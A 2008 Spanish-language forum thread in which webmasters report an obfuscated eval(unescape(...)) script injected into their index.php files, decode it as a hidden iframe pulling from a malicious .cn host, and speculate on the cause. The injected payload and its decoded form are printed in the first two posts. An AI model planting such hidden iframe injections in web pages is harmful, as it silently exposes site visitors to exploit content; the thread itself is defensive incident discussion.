No estás registrado (Registrarse)

Vanilla 1.1.10 es un producto de Lussumo. Para más información: Documentación, Soporte.

Desarrollo Web: Codigo de posible Hackeo

Abajo

1 a 15 de 15

  1.  
    • CommentAuthormalaxpina
    • CommentTimeApr 25th 2008 editado
     # 1
    Me han insertado este codigo al final de en varios index.php

    <!-- ~ --><script type="text/javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27
    %5C%75%30%30%33%63%5C%75%30%30%

    36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%
    30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%

    33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30
    %30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%

    5C%75%30%30%37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30
    %36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%

    75%30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30
    %36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%

    30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30
    %36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%

    30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%35%5C%75%30%3
    0%32%32%5C%75%30%30%32%30%5C%75%30%30%37%37%5C%75%30%30%

    36%39%5C%75%30%30%36%34%5C%75%30%30%37%34%5C%75%30%30%36%38%5C%75%
    30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%

    32%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%30%30%36%35%5C%75%30
    %30%36%39%5C%75%30%30%36%37%5C%75%30%30%36%38%5C%75%30%30%37%34%

    5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30
    %32%32%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%34%5C%

    75%30%30%37%39%5C%75%30%30%36%63%5C%75%30%30%36%35%5C%75%30%30%33
    %64%5C%75%30%30%32%32%5C%75%30%30%36%34%5C%75%30%30%36%39%5C%75%

    30%30%37%33%5C%75%30%30%37%30%5C%75%30%30%36%63%5C%75%30%30%36%3
    1%5C%75%30%30%37%39%5C%75%30%30%33%61%5C%75%30%30%36%65%5C%75%30%

    30%36%66%5C%75%30%30%36%65%5C%75%30%30%36%35%5C%75%30%30%32%32%5C
    %75%30%30%33%65%5C%75%30%30%33%63%5C%75%30%30%32%66%5C%75%30%30%

    36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%
    30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%33%65%27%29%3B"));
    </script><!-- ~ -->

    Alguien sabe que es eso?

    Lo malo de todo esto es que ese código lo han metido tanto en foros en phpbb3, como en wordpress, como en un script propio así que supongo que para meterme ese código se aprovechan de alguna vulnerabilidad del servidor :angry:
    •  
      CommentAuthorPedro
    • CommentTimeApr 25th 2008
     # 2
    Pone document.write ( <iframe src="http://orentraff.cn/in.cgi?5" width="0" height="0" style="display:none"></iframe> ) ;

    Básicamente un iframe, con alguna porquería, supongo...X-Y.es
    • CommentAuthormalaxpina
    • CommentTimeApr 25th 2008
     # 3
    :angry::angry::angry:

    Esto me ha pasado en servage. Si usais servage echar un vistazo al los index.php
    A mi me han metido el código el 14/4/2008

    Gracias Pedro por la información.
  4.  # 4
    ¿Del servidor? :que:
    Lo más seguro es que sea una vulnerabilidad de tus archivos. Si me pasas la URL de tu sitio, te puedo decir si veo algún fallo de seguridad.

    Y lo primero que yo haría en tu lugar es cambiar todas las contraseñas (email-hosting-paypal... TODO!) puesto que si usabas la contraseña de alguno de esos servicios (con el del email basta) para la base de datos de alguno de tus sitios o para alguna cuenta de tus foros, usuario... seguramente estarán ahora mismo usándola.

    Un saludo.
    • CommentAuthormalaxpina
    • CommentTimeApr 25th 2008
     # 5
    Me da la impresión que ni se molestan en ver lo que hackean. Lo harán con bots lo mas rápido posible. Porque para hackear, wordpress, phpbb3 y otro tipo de script tiene que ser un fallo de seguridad del servidor que permitir insertar código en archivos .php. Además las webs debe estar online. Tengo web que no están online pero si en el servidor y no las han hackeado.
    Y web que están online pero no están en los buscadores tampoco las han tocado.

    Y lo de las contraseñas suele usar una contraseña para cada cosa y casi casi un email para cada cosa, también. De todas maneras cambiare las más importantes por si acaso.
  6.  # 6
    Lo de los bots es cierto, pero lo de "fallo de seguridad del servidor" es muy poco probable. Mira, si tienes todo actualizado, lo más seguro es que tras cambiar las contraseñas no vuelvas a tener problema. Desconozco el sistema de panel de Servage (personalmente no me gustan los "custom panels"), pero es posible que hayan accedido a tu cuenta por fuerza bruta (probando contraseñas programáticamente mediante programas especiales).

    Aunque lo más probable es, insisto, que sea un error tuyo (si todo lo anterior está correcto) al programar en PHP. Por seguridad de nuestros compañeros demenitas, no puedo decir aquí las posibles vulnerabilidades que puedas tener.
    De ahí que te pidiera que me susurraras el sitio, para poderte hacer una "mini-auditoría" de seguridad.

    Un saludo.
    • CommentAuthormalaxpina
    • CommentTimeApr 25th 2008
     # 7
    Lo que me ha pasado a mi creo que le ha pasado a más gente. Y si le pasa a servage que en teoria es una empresa grande supongo que le puede pasar a otros...

    Mis idiomas dejan mucho que desear pero he encontrado esto que les ha pasado lo mismo:
    http://www.proxyutza.com/exploit-iframe-trojan-infection/
    http://forum.html.it/forum/showthread.php?threadid=1222723
    http://forum.joomla.org/viewtopic.php?f=189&t=278448&p=1251197
    •  
      CommentAuthorCarlitos
    • CommentTimeApr 25th 2008
     # 8
    Son codigos encriptados que añaden a las webs por algun fallo de seguridad o bug suelen ser mediante inyeción sql,,, no hay que usar programitas dudosos ni versiones sin actualizar.

    Yo ya e tenido un problema con los plugins de wp como acabo de escribir en otro post.
  9.  # 9
    Posted By: CarlitosSon codigos encriptados que añaden a las webs por algun fallo de seguridad o bug suelen ser mediante inyeción sql,,, no hay que usar programitas dudosos ni versiones sin actualizar.

    Yo ya e tenido un problema con los plugins de wp como acabo de escribir en otro post.


    ¿Inyección SQL? Acaba de decir que los ha añadido a los archivos en sí (index.php).
    Mediante inyección SQL no se pueden manejar archivos.

    Mediante inyección SQL técnicamente sólo se puede o imprimir los datos de la base de datos, o cambiarlos (para añadir códigos de exploit como éstos).

    Su problema seguramente es debido a algún script que le hayan hecho o que él haya hecho... o de éstos antiguos que andan por la red.

    Una vez me encontré con un "webmaster" colega cuyo sitio estaba más vulnerable imposible, una verguenza. No se lo creyó que era vulnerable (ni le dió importancia en absoluto) hasta que no le dije la contraseña que tenía puesta para la base de datos. Entonces se asustó y se puso a arreglarlo. :meparto:
    •  
      CommentAuthordamefuego
    • CommentTimeApr 25th 2008
     # 10
    Encontre esta nota que puede ayudarte, parece una ataque malo, malísimo.

    http://www.hacerfortuna.com/los-espias-han-infectado-los-s.html
    •  
      CommentAuthorHispaOnline
    • CommentTimeApr 25th 2008 editado
     # 11
    Posted By: damefuegoEncontre esta nota que puede ayudarte, parece una ataque malo, malísimo.

    http://www.hacerfortuna.com/los-espias-han-infectado-los-s.html

    :meparto::meparto:
    ¿espías? A ver, Free20 (a lo que enlaza este ataque en particular) realiza muchas cosas malas, pero ninguna es de espionaje. Pagan por tráfico en iframe. Exploits, y eso, contienen. Pero no son espías rusos :).

    Aún así es peligroso y "cosa mala". No recomiendo usarlos para monetizar el tráfico. Lo digo por si a alguien se le ocurre probar.
    •  
      CommentAuthorjayalaf
    • CommentTimeApr 25th 2008
     # 12
    a mi tambien me paso :( , al revisar el xferlog me di cuenta de que el codigo que añaden a los index.php lo estan subiendo por ftp desde una IP que pertenece al mismo servidor donde tengo hospedados un par de sitios, lo cual es sumamente preocupante, ya que de alguna manera estan teniendo acceso directo a nuestras claves, para todos los sitios que tengo online utilizo siempre diferentes usuarios//claves para ftp, mysql, admin.... esoyt usando ApolloHosting"Yo no se para que sirve la Internet"
  13.  # 13
    Posted By: jayalafa mi tambien me paso :( , al revisar el xferlog me di cuenta de que el codigo que añaden a los index.php lo estan subiendo por ftp desde una IP que pertenece al mismo servidor donde tengo hospedados un par de sitios, lo cual es sumamente preocupante, ya que de alguna manera estan teniendo acceso directo a nuestras claves, para todos los sitios que tengo online utilizo siempre diferentes usuarios//claves para ftp, mysql, admin.... esoyt usando ApolloHostingsiempre vendran.... nombres mejoooores !!!

    O usan tu hosting, o son los de tu hosting. Es lo único que se me ocurre. :que:
    •  
      CommentAuthorjayalaf
    • CommentTimeApr 26th 2008 editado
     # 14
    Posted By: HispaOnlineO usan tu hosting, o son los de tu hosting. Es lo único que se me ocurre



    pues por las dudas y por si acaso en estos dias cambio de hosting"Yo no se para que sirve la Internet"
    • CommentAuthormalaxpina
    • CommentTimeApr 26th 2008
     # 15
    Estoy casi seguro que ha sido un problema de seguridad del servidor.

    Uso más servidores y solo le ha afectado a uno, el de servage. Así que no creo que tengan mis contraseñas, ni mi pc este infectado.

    Solo han atacado web que están "visibles" desde internet. Así que supongo que se dedicaran a rastrear ips de servage y ver las web que están alojadas en esas ips.

1 a 15 de 15

  1.